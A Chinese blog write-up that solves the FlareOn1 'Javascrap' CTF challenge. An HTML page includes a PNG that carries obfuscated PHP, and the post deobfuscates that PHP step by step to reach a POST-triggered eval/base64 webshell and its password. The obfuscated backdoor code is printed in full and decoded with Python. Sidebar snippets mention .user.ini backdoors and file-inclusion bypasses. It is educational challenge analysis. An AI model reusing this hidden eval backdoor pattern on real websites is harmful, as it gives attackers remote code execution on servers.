CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式,得到后门的密码

最新推荐文章于 2024-06-06 18:05:34 发布
最新推荐文章于 2024-06-06 18:05:34 发布
阅读量1.7k 收藏 4
点赞数 2
分类专栏: CTF-逆向 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37157335/article/details/124557445
版权

CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式,得到后门的密码

来源:https://buuoj.cn/

内容

附件:链接:https://pan.baidu.com/s/1N2bN_TueCtuqTkNlE3tKeA?pwd=hqxm 提取码:hqxm

答案:a11.that.java5crap@flare-on.com

总体思路

文件夹名字是c2,猜测是后门,故发现html文件中存在异常include

查看include的文件发现php代码

解析代码发现后门post的参数

通过脑洞和直觉解析参数得到flag

详细步骤

  • 拿到题目发现是一个html文件,观察整个文件,发现文件尾部有个<?php include "img/flare-on.png" ?>,猜测是一个后门

    • image-20220502133336172
    • image-20220502133349637

  • 找到目录下的flare-on.png,拖进010editor(CTF逆向-常用的逆向工具 提取码:pnbt )里面查看,发现文件尾部存在一些php执行

    • image-20220502133533907

  • 将其复制出来稍作处理

    • <?php 
  $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
  $order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
  $do_me="";
  for($i=0;$i<count($order);$i++){
    $do_me=$do_me.$terms[$order[$i]];
  }
    eval($do_me); 
?>

  • 在python中还原它

    • order = [59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24,
         1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47]
terms = ["M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U",
         "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|"]

result = [terms[x] for x in order]
content = ''.join(result)
print(content)
# $_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';
# $__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
# $___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
# eval($___($__));

  • 发现"\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"就是$code=base64_decode($_);eval($code);

  • 进一步处理,得到解码值

    • php_final_content = 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9'
php_final_content = base64.b64decode(php_final_content)
print(php_final_content.decode())
# if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }

    • if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }

  • 发现两个字符串,之间存在一些区别,如第三个字符,第一个字符串的\49在第二个字符串里面是\x31,发现0x31其实就是49的16进制值。推测出将会做替换,将\XX变换为chr(xx)。得到解码方法将带【\】的字符按整数类型寻找对应的ascii码

    • "\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"
    • "\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"
  • def get_result(php_post:str)->str:
  php_post = php_post.split('\\')[1:]

  # 将带【\】的字符按整数类型寻找对应的ascii码
  def convert(x: str) -> str:
      if x[0] == 'x':  # 16进制数
          return struct.unpack('<b',bytes.fromhex(x[1:]))[0]
      return int(x)

  php_post = [convert(x) for x in php_post]
  php_post = [chr(x) for x in php_post]
  php_post = ''.join(php_post)
  return php_post

php_post = r'\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D'
print(get_result(php_post)) # a11DOTthatDOTjava5crapATflareDASHonDOTcom

php_post = r'\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D'
print(get_result(php_post)) # a11DOTthatDOTjava5crapATflareDASHonDOTcom

  • 得到答案a11DOTthatDOTjava5crapATflareDASHonDOTcom

  • 根据description.txt中的提示,flag格式为flag{123456@flare-on.com}

  • 故将答案中的DOT替换为.DASH替换为-AT替换为@,得到结果为a11.that.java5crap@flare-on.com

其他文档

更多CTF逆向题通用性做法和常用工具下载参考该博文内容:CTF逆向Reverse题的玩法

相关逆向CTF题

serfend
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
几个ctf 逆向
07-31
ctf比赛碰到几个逆向题,挺有意思,拷下来研究研究。ctf 逆向 隐写
CTF-Web-Challenge:使用PHPWeb进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb进行CTF挑战链接: :
CTF】buuctf web (四)——通过配置文件构造PHP后门
m0_52923241的博客
08-19 1531
知识点 user.ini文件构成的PHP后门 .user.ini文件 它比.htaccess(分布式配置文件)用的更广,不管是nginx/apache/IIS,只要是以fastcgi(进程管理器)运行的php都可以用这个方法。 [SUCTF 2019]CheckIn 上传一个a.php文件,文件内容为<?php phpinfo();?> 提示非法后缀,将后缀php修改为jpg 提示<?被过滤了 将内容变为脚本标记格式:<script language=php> phpi
[buuctf.reverse] 102_[FlareOn1]Javascrap
weixin_52640415的博客
06-06 277
一个misc题
青少年CTFPHP后门PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 1846
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
ctf php黑魔法,社团的CTF逆向题WriteUp
weixin_42457435的博客
03-11 417
最近社团弄了CTF比赛,然后我就帮忙写了逆向的题目,这里写一下WriteUp,题目和源码在附件给出一个简单的逆向:one_jmp_to_flag.exe这题算是签到题,直接OD智能搜索就完事了,flag{Welcome_to_GeekFZCTF} 一个简单的对比:check.exe这一道也算是送分题,可以用IDA直接分析可以看出来,这里就是读取输入的字符串,然后逐个进行对比,这里可以直接用IDA...
CTF入门之web逆向
小傅
07-01 5569
题型: MISC(安全杂项)、PPC(编程类)、CRYPTO(密码学)、REVERSE(逆向)、STEGA(隐写)、PWN(溢出) WEBweb类):WEB应用在今天越来越广泛,也是CTF夺旗竞赛的主要题型,题目涉及到常见的Web漏洞,诸如注入、XSS、文件包含、代码审计、上传等漏洞。这些题目都不是简单的注入、上传题目,至少会有一层的安全过滤,需要选手想办法绕过。且Web题目是国内比较多也...
恶意软件分析实战03-一个后门逆向分析
輚至消亡
07-20 705
1. Lab03-03 先查壳发现无壳, VC++6.0编写: VT上走一波, 57个杀毒引擎认定是恶意的。 有资源表而且那么大,可能夹了私活: ResHacker查看资源节内容, 的确是带了东西,这玩意感觉也不像是多媒体资源。也有可能是被加密了存进去的或者加壳了。 来查询一下导入表: 该恶意程序只导入了kernel32.dll,从导入表的导入API来判断, 该恶意进程可能: 1. 使用了傀儡进程技术,即挂起创建一个合法的程序但却在内部执行非法的shellcode ...
CTF逆向-简单虚拟机指令类题目分析
11-26
CTF逆向-简单虚拟机指令类题目分析CTF逆向-简单虚拟机指令类题目分析
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
CTF逆向(reverse)入门脑图
10-25
CTF逆向(reverse)入门脑图,xmind格式文件。Reverse即逆向工程,题目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译扎实功底。主要考查参赛选手的逆向分析能力。 仅供CTF竞赛参考使用,请不要做违法乱纪的事情
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
快速入门CTF逆向
06-21
通过本课程的学习,学生可以对网络安全CTF比赛当常见的基础逆向有相对一定的认识,可以适当的减少在部分比赛常见工具上的学习时间,加快对于工具的理解,快速掌握基础的逆向题目做法和部分基础思路
php逆向解密,PHP可逆加密与解密函数
weixin_29414105的博客
03-20 570
function encrypt($data, $key) {$prep_code = serialize($data);$block = mcrypt_get_block_size('des', 'ecb');if (($pad = $block - (strlen($prep_code) % $block)) < $block) {$prep_code .= str_repeat(chr...
BUUCTF Misc 后门查杀
Leslie_LIL的博客
02-28 700
题目如下: 解压后得到文件夹 按照题目提示,用webshell查杀工具D盾扫描后门 D盾下载https://www.d99net.net/ 打开文件,按照题目要求查找密码 密码即是flag
ctf图文讲解-FTP后门服务利用
weixin_45441727的博客
03-17 605
首先进行靶机发现 netdiscover -r 靶机IP网段 发现靶机,对靶机进行操作系统版本扫描 nmap -sV 靶机IP 发现21端口版本号为 ProFTPD 1.3.3c 通过searchsploit查看对应版本号漏洞文件 searchsploit ProFTPD 1.3.3c 查看文件 cat /usr/share/exploitdb/exploits/linux/remote/15662.txt 很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法
BUUCTF 后门查杀 writeup
zhangzhaolin12的博客
10-11 750
这里题目说了,flag是密码,那就可以挨个找password这个关键字,但是真正的flag不是password,而是pass有一点点坑。使用D盾进行扫描文件夹,就可以找出网站的后门flag就在级别最高的那个文件里,这里有路径,找到这个文件,就可以得到flag。 ...
渗透测试模拟实战——暴力破解、留后门隐藏账户与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)
W小哥
03-23 8042
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆 一、环境搭建 靶机: Windwos Server 2008 系统 靶机IP地址: 192.168.226.137 攻击IP地址: 192.168.226.1 二、模拟攻击 2.1 扫描端口 拿到目标IP首先使用nmap扫描,探测一下开放的端口 nmap -sS 192.168.226.137 发现目标系统的 3389 号端口开发 2.2 暴力破解 Administrator 密码 使用 hydra 工具爆破 Adminis
二叉树-堆的详解
最新发布
HardenMvp1的博客
06-06 1078
二叉树-堆的详解
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP ,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值